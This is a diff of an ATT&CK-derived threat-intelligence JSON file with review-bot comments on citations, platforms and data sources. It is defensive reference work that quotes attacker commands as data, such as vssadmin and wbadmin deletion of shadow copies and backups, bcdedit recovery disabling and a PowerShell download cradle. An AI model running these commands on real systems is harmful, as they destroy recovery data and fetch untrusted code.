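Review bot: `"Azure AD"` and `"Google Workspace"` are added as platforms, but the only supporting material in this cluster is the AWS CloudTrail/CloudWatch and Office 365 text in the description plus the pre-existing `cloud.google.com/logging` and `az monitor diagnostic-settings` refs, the latter of which concerns Azure Monitor on IaaS rather than Azure AD sign-in or audit logging. Worth confirming the platform list matches upstream rather than being inferred here. The added `"User Account: User Account Modification"` data source does line up with the new `Set-MailboxAuditBypassAssociation` and license-downgrade examples in the description.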
@@ -10890,7 +10949,6 @@
"refs": [
"http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf",
"https://attack.mitre.org/techniques/T1553/004",
- "https://capec.mitre.org/data/definitions/479.html",
"https://docs.microsoft.com/sysinternals/downloads/sigcheck",
"https://en.wikipedia.org/wiki/Root_certificate",
"https://objective-see.com/blog/blog_0x26.html",
@@ -11101,8 +11159,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1566/003",
- "https://capec.mitre.org/data/definitions/163.html"
+ "https://attack.mitre.org/techniques/T1566/003"
]
},
"related": [
@@ -11229,7 +11286,6 @@
"refs": [
"https://attack.mitre.org/techniques/T1547/004",
"https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order",
- "https://capec.mitre.org/data/definitions/579.html",
"https://technet.microsoft.com/en-us/sysinternals/bb963902"
]
},
@@ -11468,8 +11524,6 @@
"http://www.nth-dimension.org.uk/pub/BTL.pdf",
"https://attack.mitre.org/techniques/T1574/006",
"https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/",
- "https://capec.mitre.org/data/definitions/13.html",
- "https://capec.mitre.org/data/definitions/640.html",
"https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html",
"https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191",
"https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/",
@@ -11489,7 +11543,7 @@
"value": "Dynamic Linker Hijacking - T1574.006"
},
{
- "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware
, suspicious
, phish
, and hack
) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)",
+ "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware
, suspicious
, phish
, and hack
) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)\n\nIn some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).",
"meta": {
"external_id": "T1564.008",
"kill_chain": [
@@ -11511,6 +11565,7 @@
"https://attack.mitre.org/techniques/T1564/008",
"https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps",
"https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps",
+ "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules",
"https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac",
"https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59",
"https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154",
@@ -11557,6 +11612,72 @@
"uuid": "0708ae90-d0eb-4938-9a76-d0fc94f6eec1",
"value": "Revert Cloud Instance - T1578.004"
},
+ {
+ "description": "Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.(Citation: Network Provider API) During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.(Citation: NPPSPY - Huntress)(Citation: NPPSPY Video)(Citation: NPLogonNotify) \n\nAdversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.(Citation: NPPSPY) Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.(Citation: NPLogonNotify)\n\nAdversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.(Citation: NPPSPY - Huntress)",
+ "meta": {
+ "external_id": "T1556.008",
+ "kill_chain": [
+ "mitre-attack:credential-access",
+ "mitre-attack:defense-evasion",
+ "mitre-attack:persistence"
+ ],
+ "mitre_data_sources": [
+ "File: File Creation",
+ "Process: OS API Execution",
+ "Windows Registry: Windows Registry Key Creation",
+ "Windows Registry: Windows Registry Key Modification"
+ ],
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1556/008",
+ "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
+ "https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify",
+ "https://learn.microsoft.com/en-us/windows/win32/secauthn/network-provider-api",
+ "https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy",
+ "https://www.youtube.com/watch?v=ggY3srD9dYs"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "90c4a591-d02d-490b-92aa-619d9701ac04",
+ "value": "Network Provider DLL - T1556.008"
+ },
+ {
+ "description": "Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.\n\nRather than or in addition to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), an adversary can spoof positive affirmations that security tools are continuing to function even after legitimate security tools have been disabled (e.g., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)). An adversary can also present a “healthy” system status even after infection. This can be abused to enable further malicious activity by delaying defender responses.\n\nFor example, adversaries may show a fake Windows Security GUI and tray icon with a “healthy” system status after Windows Defender and other system tools have been disabled.(Citation: BlackBasta)",
+ "meta": {
+ "external_id": "T1562.011",
+ "kill_chain": [
+ "mitre-attack:defense-evasion"
+ ],
+ "mitre_data_sources": [
+ "Process: Process Creation",
+ "Sensor Health: Host Status"
+ ],
+ "mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1562/011",
+ "https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "bef8aaee-961d-4359-a308-4c2182bcedff",
+ "value": "Spoof Security Alerting - T1562.011"
+ },
{
"description": "Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart
or ~/.config/autostart
directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006)\n\nWithin an XDG autostart entry file, the Type
key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The Name
key indicates an arbitrary name assigned by the creator and the Exec
key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys)\n\nAdversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs.",
"meta": {
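Review bot: the `related` blocks of the two added sub-techniques (Network Provider DLL - T1556.008 with dest-uuid f4c1826f-a322-41cd-9557-562100848c84, Spoof Security Alerting - T1562.011 with dest-uuid 3d333250-30e4-4a82-9edc-756c68afc529) declare a `subtechnique-of` relation to parent elements that this diff does not show; confirm both UUIDs resolve to the T1556 and T1562 elements already present in this cluster, otherwise galaxy consumers get a relation they cannot follow.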
@@ -11604,7 +11725,7 @@
"value": "Identify business processes/tempo - T1280"
},
{
- "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami
. In macOS and Linux, the currently logged in user can be identified with w
and who
. On macOS the dscl . list /Users | grep -v '_'
command can also be used to enumerate user accounts. Environment variables, such as %USERNAME%
and $USER
, may also be used to access this information.",
+ "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami
. In macOS and Linux, the currently logged in user can be identified with w
and who
. On macOS the dscl . list /Users | grep -v '_'
command can also be used to enumerate user accounts. Environment variables, such as %USERNAME%
and $USER
, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)",
"meta": {
"external_id": "T1033",
"kill_chain": [
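Review bot: the network-device sentence appended to the T1033 description introduces two citation keys, show_ssh_users_cmd_cisco and US-CERT TA18-106A Network Infrastructure Devices 2018, whose URLs only arrive in the following refs hunk (the cisco.com and us-cert.cisa.gov entries); the two hunks are only consistent together, so they must not be split or cherry-picked apart.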
@@ -11624,11 +11745,13 @@
"mitre_platforms": [
"Linux",
"macOS",
- "Windows"
+ "Windows",
+ "Network"
],
"refs": [
"https://attack.mitre.org/techniques/T1033",
- "https://capec.mitre.org/data/definitions/577.html"
+ "https://us-cert.cisa.gov/ncas/alerts/TA18-106A",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html"
]
},
"uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
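Review bot: adding "Network" to mitre_platforms for T1033 widens the technique to network devices, but the hunk does not touch mitre_data_sources, which precedes mitre_platforms in these elements; check that the element keeps a data source covering device CLI activity (this cluster uses "Command: Command Execution" for that, as in the T1490 element further down), otherwise the new platform has no detection hook attached. Replacing the CAPEC-577 URL with the Cisco command reference and the TA18-106A alert keeps the refs array alphabetically sorted, consistent with the other refs arrays in the file.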
@@ -11810,7 +11933,7 @@
"value": "Obtain booter/stressor subscription - T1396"
},
{
- "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.(Citation: Prevailion DarkWatchman 2021)",
+ "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)\n\nAdversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.",
"meta": {
"external_id": "T1010",
"kill_chain": [
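Review bot: the rewritten T1010 description contains a typo, "could be used identify potential data to collect", which should read "could be used to identify"; since this text is mirrored from upstream ATT&CK, fix it upstream (or accept it here and track it) rather than hand-editing the generated JSON, which the next regeneration would overwrite.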
@@ -11828,7 +11951,8 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1010",
- "https://www.prevailion.com/darkwatchman-new-fileless-techniques/"
+ "https://www.prevailion.com/darkwatchman-new-fileless-techniques/",
+ "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/"
]
},
"uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830",
@@ -12005,8 +12129,7 @@
"Linux"
],
"refs": [
- "https://attack.mitre.org/techniques/T1007",
- "https://capec.mitre.org/data/definitions/574.html"
+ "https://attack.mitre.org/techniques/T1007"
]
},
"uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
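Review bot: this hunk drops the CAPEC cross-reference (capec.mitre.org/data/definitions/574.html) from T1007's refs, and the same diff removes the CAPEC links for T1033, T1080, T1120, T1018, T1072, T1082, T1046, T1069, T1124, T1133, T1134 and T1135 as well; anyone using the galaxy refs to pivot from ATT&CK techniques to CAPEC patterns loses that mapping, so confirm it reflects an upstream ATT&CK change and state it in the commit message or changelog rather than leaving it implicit in a large regeneration diff.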
@@ -12034,7 +12157,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1080",
- "https://capec.mitre.org/data/definitions/562.html",
"https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html"
]
},
@@ -12088,7 +12210,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1120",
- "https://capec.mitre.org/data/definitions/646.html",
"https://linuxhint.com/list-usb-devices-linux/",
"https://ss64.com/osx/system_profiler.html"
]
@@ -12235,7 +12356,7 @@
"value": "Device Administrator Permissions - T1401"
},
{
- "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)\n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString()
and Invoke-WebRequest
. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)",
+ "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)\n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString()
and Invoke-WebRequest
. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)",
"meta": {
"external_id": "T1105",
"kill_chain": [
@@ -12334,7 +12455,7 @@
"value": "Application Deployment Software - T1017"
},
{
- "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ",
+ "description": "Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ",
"meta": {
"external_id": "T1071",
"kill_chain": [
@@ -12411,7 +12532,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1018",
- "https://capec.mitre.org/data/definitions/292.html",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a",
"https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql",
"https://www.us-cert.gov/ncas/alerts/TA18-106A"
@@ -12690,8 +12810,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1072",
- "https://capec.mitre.org/data/definitions/187.html"
+ "https://attack.mitre.org/techniques/T1072"
]
},
"uuid": "92a78814-b191-47ca-909c-1ccfe3777414",
@@ -12718,7 +12837,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1082",
- "https://capec.mitre.org/data/definitions/312.html",
"https://cloud.google.com/compute/docs/reference/rest/v1/instances",
"https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html",
"https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get",
@@ -12898,7 +13016,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1046",
- "https://capec.mitre.org/data/definitions/300.html",
"https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html",
"https://themittenmac.com/what-does-apt-activity-look-like-on-macos/",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a"
@@ -12971,28 +13088,36 @@
"value": "Stored Application Data - T1409"
},
{
- "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe
can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
\n* wbadmin.exe
can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
\n* bcdedit.exe
can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
",
+ "description": "Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.\n\nOperating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Furthermore, adversaries may disable recovery notifications, then corrupt backups.(Citation: disable_notif_synology_ransom)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe
can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
\n* wbadmin.exe
can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
\n* bcdedit.exe
can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
\n* REAgentC.exe
can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system\n\nOn network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.\n\nAdversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)",
"meta": {
"external_id": "T1490",
"kill_chain": [
"mitre-attack:impact"
],
"mitre_data_sources": [
+ "Cloud Storage: Cloud Storage Deletion",
"Command: Command Execution",
"File: File Deletion",
"Process: Process Creation",
"Service: Service Metadata",
+ "Snapshot: Snapshot Deletion",
"Windows Registry: Windows Registry Key Modification"
],
"mitre_platforms": [
"Windows",
"macOS",
- "Linux"
+ "Linux",
+ "Network",
+ "IaaS"
],
"refs": [
"https://attack.mitre.org/techniques/T1490",
"https://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
- "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html"
+ "https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/",
+ "https://twitter.com/TheDFIRReport/status/1498657590259109894",
+ "https://www.darkreading.com/attacks-breaches/code-hosting-service-shuts-down-after-cyber-attack",
+ "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html",
+ "https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/"
]
},
"uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
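Review bot: the sentence added to the T1490 description about disabling recovery notifications before corrupting backups is backed by the citation key disable_notif_synology_ransom, and the only new ref that can correspond to it is the twitter.com/TheDFIRReport status URL; a tweet is a fragile primary source for a galaxy entry, so check whether upstream offers a more durable reference for that claim. The added data sources (Cloud Storage: Cloud Storage Deletion, Snapshot: Snapshot Deletion) line up with the new IaaS platform and the new cloud paragraph, which is the detection-relevant part of this change; the Network platform, by contrast, gains no new data source even though the description now covers deleting backup firmware images and reloading the device.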
@@ -13260,7 +13385,7 @@
"value": "Cloud Infrastructure Discovery - T1580"
},
{
- "description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\n\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator)\n\nOnce forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)",
+ "description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\n\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials.(Citation: AWS Temporary Security Credentials)\n\nOnce forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance) ",
"meta": {
"external_id": "T1606",
"kill_chain": [
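Review bot: the updated T1606 description string now ends with a trailing space before the closing quote ("...Customer Guidance) "), which the previous version did not have; it is harmless for JSON validity but will churn on every regeneration, so strip it upstream or in the generator. The new AssumeRole / GetFederationToken sentence relies on the citation key AWS Temporary Security Credentials, whose docs.aws.amazon.com URL is only added in the next hunk, so the two hunks belong together.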
@@ -13283,6 +13408,7 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1606",
+ "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html",
"https://github.com/damianh/aws-adfs-credential-generator",
"https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/",
"https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/",
@@ -13387,7 +13513,7 @@
"value": "NTFS File Attributes - T1096"
},
{
- "description": "Adversaries may attempt to find group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.",
+ "description": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.\n\nAdversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)",
"meta": {
"external_id": "T1069",
"kill_chain": [
@@ -13413,8 +13539,8 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1069",
- "https://capec.mitre.org/data/definitions/576.html",
- "https://kubernetes.io/docs/reference/access-authn-authz/authorization/"
+ "https://kubernetes.io/docs/reference/access-authn-authz/authorization/",
+ "https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/"
]
},
"uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce",
@@ -13648,7 +13774,7 @@
"value": "Credentials in Registry - T1214"
},
{
- "description": "An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\\\hostname
to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz
. (Citation: Technet Windows Time Service)\n\nThis information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)",
+ "description": "An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time)(Citation: Technet Windows Time Service)\n\nSystem time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\\\hostname
to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz
